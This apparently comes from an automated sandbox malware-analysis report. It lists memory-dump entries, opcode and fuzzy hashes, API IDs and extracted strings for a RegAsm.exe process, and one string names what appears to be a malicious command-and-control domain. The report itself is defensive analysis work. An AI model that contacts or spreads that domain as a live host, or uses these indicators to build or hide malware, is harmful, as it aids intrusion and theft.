        • String ID:
        • API String ID:
        • Opcode ID: ab7c002bbd1d2b19c651350f826b154a225611c78f68c3023b16f09186cf9dc2
        • Instruction ID: 646ad6f42c03963388111ef06097d1b51d9dff72028faada1df9dc79367c8402
        • Opcode Fuzzy Hash: ab7c002bbd1d2b19c651350f826b154a225611c78f68c3023b16f09186cf9dc2
        • Instruction Fuzzy Hash: 3BE0C237B0522106A7A8CE36AC01677F3E1EBCA711F4DA46EE042D3208D238C8418269
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 32ec159fb1e8baa5a06c0379accc7af5b325d4415c182fab87ce06ccca47088d
        • Instruction ID: 825f81d249fc7c2b3b8fd02e010147e91827b29c8c3219e417adbeef69ccc91b
        • Opcode Fuzzy Hash: 32ec159fb1e8baa5a06c0379accc7af5b325d4415c182fab87ce06ccca47088d
        • Instruction Fuzzy Hash: 81D012704083C0CFC3269F7A84D4031FFF0AB53201F082A9DC1D163512C674A24CD759
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: e015d6c357b2cfc46d78203d893cf43299e4c7a463b965b74652dba6349ad9dd
        • Instruction ID: 208e7c7865d3c15796767fa78808d01ca5d58271841f0dbd6d810dd0fb23a9d9
        • Opcode Fuzzy Hash: e015d6c357b2cfc46d78203d893cf43299e4c7a463b965b74652dba6349ad9dd
        • Instruction Fuzzy Hash: 36B09221A4C381CAC2045E348290434FAF45A83382F18347880C03342182348544961E

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 436 427fbf-428222 SysAllocString 437 42822a-428231 436->437 438 428233-428263 call 42b1f0 437->438 439 428265-4282a0 437->439 438->437
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: AllocString
        • String ID: !$#$%$'$)$+$-$/$9$;$@$F$G$L$`$e$f$g$i$m$q$q$r$s$u$w$x$y${$}
        • API String ID: 2525500382-184647877
        • Opcode ID: f313cd3e6c3c74b4c7d6e55d8df0cff20f31d5ffbac6f4c66b038fe8d6c8fc08
        • Instruction ID: b7ff39a961a08a92465b05a2fcf1e7126ec40a30fea22ecf834f950a24c2b2f5
        • Opcode Fuzzy Hash: f313cd3e6c3c74b4c7d6e55d8df0cff20f31d5ffbac6f4c66b038fe8d6c8fc08
        • Instruction Fuzzy Hash: 3C71802050D7C1CDE332C7689848B9BBED16BA7318F084A9ED1ED5B2D2C3BA5549C727
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: Variant$ClearInit
        • String ID: !$#$%$'$)$*$1$<$=$D$H$I$O$T$W
        • API String ID: 2610073882-490708954
        • Opcode ID: 2d1f05bfaac1dc43aa837fe879617a49f6efda1a223bae83672551efda08642e
        • Instruction ID: 7f15bc0b4b888700497e6a5c597d18a2f9d32770e2fb9fd3c8e7a25793a5d04b
        • Opcode Fuzzy Hash: 2d1f05bfaac1dc43aa837fe879617a49f6efda1a223bae83672551efda08642e
        • Instruction Fuzzy Hash: FD51F67000C7C28AD332DB6894487DEBFE06BA2324F048A6DE1E8476D2D7B54589C763
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: Variant$ClearInit
        • String ID: !$#$%$&$'$-$5$=$D$J$K$M
        • API String ID: 2610073882-2184588229
        • Opcode ID: bb2ab71c1f6c2cd37f8ae824c0502d6ec6243625ac73289c60a0569c4817a6e7
        • Instruction ID: 015ba4d9e612af17b2960f3274dcde5396338608fb32c7b17c0d90787f3d7c52
        • Opcode Fuzzy Hash: bb2ab71c1f6c2cd37f8ae824c0502d6ec6243625ac73289c60a0569c4817a6e7
        • Instruction Fuzzy Hash: 5241D36010C7C1CED332DB38954979EBFE0AB92324F048A9DE4EC87292DB758509DB67
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: Variant$ClearInit
        • String ID: !$#$%$'$)$+$-$/$9$;
        • API String ID: 2610073882-2318925594
        • Opcode ID: 0a2e9bafe7d24be67910d26c28a8ff85a4e99bdfa7abb1d9a731de16c41bb722
        • Instruction ID: 0676460745a6f27c1b848bda3cad644b7837a00283a165a303822dbff343d47f
        • Opcode Fuzzy Hash: 0a2e9bafe7d24be67910d26c28a8ff85a4e99bdfa7abb1d9a731de16c41bb722
        • Instruction Fuzzy Hash: 5F41E47000CBC18ED322DB78944879EFFE0AB96314F584A9DE5E5873A2C7748549DB53
        APIs
        • GetSystemDirectoryW.KERNEL32(930591D3,00000104), ref: 0040D4DF
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: DirectorySystem
        • String ID: :123$Mq$assumptionflattyou.shop$tw$wu
        • API String ID: 2188284642-1420097387
        • Opcode ID: 204e44f21f05f6d9725217fa632c7c31054448c14a5f36ad4aa0fc8192fd4be1
        • Instruction ID: 7a0324817b1d23c499b212801a3df83f41ac1dbd6145a4260683a3088d64cb4e
        • Opcode Fuzzy Hash: 204e44f21f05f6d9725217fa632c7c31054448c14a5f36ad4aa0fc8192fd4be1
        • Instruction Fuzzy Hash: 22B16AB050D3C18BE3359F15D5A4BABBBE1AFC6348F040AAED4C92B391C7355905CB9A
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: String
        • String ID: 5$5
        • API String ID: 2568140703-2059066348
        • Opcode ID: 110300df1bd1ba2ebeec1dea9ca7ca6fb67ca027417a09c175717f201296cffc
        • Instruction ID: 87350df41a40c2f6dc17ee1355bf02e3aba54a30ab7b9e221eebbe2b7547dbda
        • Opcode Fuzzy Hash: 110300df1bd1ba2ebeec1dea9ca7ca6fb67ca027417a09c175717f201296cffc
        • Instruction Fuzzy Hash: 6761A2717093908FC3258E2CD49039EBBE2AFD9314F594A2EE8E9C7381DB789805D746
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: String
        • String ID: 5$5
        • API String ID: 2568140703-2059066348
        • Opcode ID: ad2e3da341f48bfdef764f4f0a06b9de312e9cc779397da2adcb9a917610175f
        • Instruction ID: 9d87ac8fdee30071d36def9c5e7e5cc6c586f1880d67323fe9e0400e7f3affeb
        • Opcode Fuzzy Hash: ad2e3da341f48bfdef764f4f0a06b9de312e9cc779397da2adcb9a917610175f
        • Instruction Fuzzy Hash: D36197717093908FC725CF28C49039EBBE2ABD9314F598A2DE8E997381DB399C45C746
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: MetricsSystem
        • String ID:
        • API String ID: 4116985748-3916222277
        • Opcode ID: e2bfdd665439a88b9fb695f7aa0b4cbfc992b72b2f88fc7f19c4bf93d57cb1af
        • Instruction ID: a27347ba28fd9ac01b1c64968218bc3745f68d8fcc187890a7882a3051f6c828
        • Opcode Fuzzy Hash: e2bfdd665439a88b9fb695f7aa0b4cbfc992b72b2f88fc7f19c4bf93d57cb1af
        • Instruction Fuzzy Hash: 563170B09143049FDB00EF6CD98565EBBF4FB88304F11892DE588DB361E774A958CB86
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: InitVariant
        • String ID: 9$n
        • API String ID: 1927566239-2400824052
        • Opcode ID: b1a6aed9f329aa4345f78be316963d03f815953c8a799474bbcf7e0680ec7796
        • Instruction ID: fd41c295578004fdf0f7040fe24ad36ee7534973189a4dc472ddedb26a7efe9d
        • Opcode Fuzzy Hash: b1a6aed9f329aa4345f78be316963d03f815953c8a799474bbcf7e0680ec7796
        • Instruction Fuzzy Hash: BE31DD7410C3C18ED3329B28C4987DEBFE0AB9A324F180A9DE0E987392C7758155CB57